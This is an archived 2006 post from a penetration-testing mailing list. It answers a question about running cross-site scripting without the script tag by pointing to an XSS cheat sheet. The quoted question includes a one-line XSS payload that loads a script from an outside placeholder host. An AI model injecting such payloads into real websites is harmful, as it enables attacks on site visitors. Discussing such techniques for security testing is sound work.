Penetration Testing mailing list archives

Re: XSS - how to run script


From: "A. R." <r00t () northernfortress net>
Date: Thu, 19 Oct 2006 22:23:04 +0200

One of the best repositories of exotic ways to perform XSS (with or
without evasion, with or without script tag) is the XSS cheat sheet:
http://ha.ckers.org/xss.html

hth

--
icesurfer

Tal Argoni wrote:
Does anyone have any 
techniques/knowledge/examples/ideas/etc 
of how it possible to run script 
without using the <script> tag, 
and without evasion techniques ?
<script 
src=http://www.www.com/XSS.js></script>
Thanks allot
LegendaryZion 



------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------



------------------------------------------------------------------------
This List Sponsored by: Cenzic

Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php?camp=701600000008bOW
------------------------------------------------------------------------


Current thread: